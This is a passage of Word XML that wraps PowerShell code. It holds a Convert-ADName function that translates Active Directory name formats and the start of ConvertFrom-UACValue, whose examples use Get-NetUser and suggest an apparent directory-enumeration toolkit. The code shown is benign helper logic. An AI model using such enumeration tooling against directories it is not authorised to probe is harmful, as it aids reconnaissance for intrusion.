    <w:p w14:paraId="53C7EE5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38106158" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67733499" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B5C44C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3874F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC345F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1F807" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B50460" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjectName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5875BCED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37DDB913" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5011D3BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateSet("NT4","Simple","Canonical")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F4B839" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $InputType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054C5640" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C958C2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F534A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateSet("NT4","Simple","Canonical")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629B3FE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OutputType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EEA0A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75955764" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D4690EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $NameTypes = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17331989" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Canonical' = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E67683A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'NT4'       = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0016292E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Simple'    = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D366E59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3445B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C636EFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if(-not $PSBoundParameters['InputType']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA60D97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if( ($ObjectName.split('/')).Count -eq 2 ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16645BB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ObjectName = $ObjectName.replace('/', '\')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F005A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775D4F1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51B1043E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ObjectName -match "^[A-Za-z]+\\[A-Za-z ]+") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFCB058" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $InputType = 'NT4'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F05D013" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0C33E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($ObjectName -match "^[A-Za-z ]+@[A-Za-z\.]+") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08301E4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $InputType = 'Simple'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390753B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922F129" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($ObjectName -match "^[A-Za-z\.]+/[A-Za-z]+/[A-Za-z/ ]+") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8AAAC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $InputType = 'Canonical'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5876D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE94E38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A8A4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning "Can not identify InType for $ObjectName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394831D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return $ObjectName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ABFF36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6A7DC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3667255D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($InputType -eq 'NT4') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1128DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjectName = $ObjectName.replace('/', '\')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63599C72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD3AC68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="768A20AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if(-not $PSBoundParameters['OutputType']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1428F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OutputType = Switch($InputType) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73AA40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'NT4' {'Canonical'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C572707" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Simple' {'NT4'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680FFD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Canonical' {'NT4'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE40C89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C1C268" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444BD311" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BED115D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # try to extract the domain from the given format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BFDCA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Domain = Switch($InputType) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7FB6AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'NT4' { $ObjectName.split("\")[0] }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8FC871" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Simple' { $ObjectName.split("@")[1] }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6009565D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Canonical' { $ObjectName.split("/")[0] }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61431A48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66541698" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="42F3A846" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Accessor functions to simplify calls to NameTranslate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B6437" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36906334" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Output = $Object.GetType().InvokeMember($Method, "InvokeMethod", $Null, $Object, $Parameters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A97D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ( $Output ) { $Output }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDFAD54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76095F61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D13B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Void] $Object.GetType().InvokeMember($Property, "SetProperty", $Null, $Object, $Parameters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509F02F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FDDFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3804257A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Translate = New-Object -ComObject NameTranslate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121E88BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3870CF8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6DE43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Invoke-Method $Translate "Init" (1, $Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00199738" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB01E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch [System.Management.Automation.MethodInvocationException] { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3713F9F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error with translate init in Convert-ADName: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14696F7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE70ACB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5995D54D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Set-Property $Translate "ChaseReferral" (0x60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424D6B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="744E3253" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ED800D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Invoke-Method $Translate "Set" ($NameTypes[$InputType], $ObjectName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10567421" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        (Invoke-Method $Translate "Get" ($NameTypes[$OutputType]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB1BDC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA4014" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch [System.Management.Automation.MethodInvocationException] {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A090F5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error with translate Set/Get in Convert-ADName: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F434B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E56C49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7816C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="760E4CC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1DA40D2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function ConvertFrom-UACValue {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999D7CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8C19E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B28A4B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5142C90E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Converts a UAC int value to human readable form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A28051E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C58FA02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7BFBB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B745EEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The int UAC value to convert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A2321" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14D28707" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ShowAll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B92C971" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7946F333" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Show all UAC values, with a + indicating the value is currently set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ECF52C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A866662" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112AFCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04EED1B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; ConvertFrom-UACValue -Value 66176</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF5010" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6FDF4AB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Convert the UAC value 66176 to human readable format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6441D3E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C6A1536" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC947B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="099900B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC16C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43C2F55C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Convert the UAC value for 'jason' to human readable format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294BAA2F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56CC85CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35A9D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48C188ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue -ShowAll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AED49F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="251FC083" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Convert the UAC value for 'jason' to human readable format, showing all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2938E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        possible UAC values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E780108" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCC5BF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F0ADDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A7B1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36619EC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A148484" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Value,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602CA873" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C471E38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5F0709" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ShowAll</w:t>
      </w:r>
    </w:p>
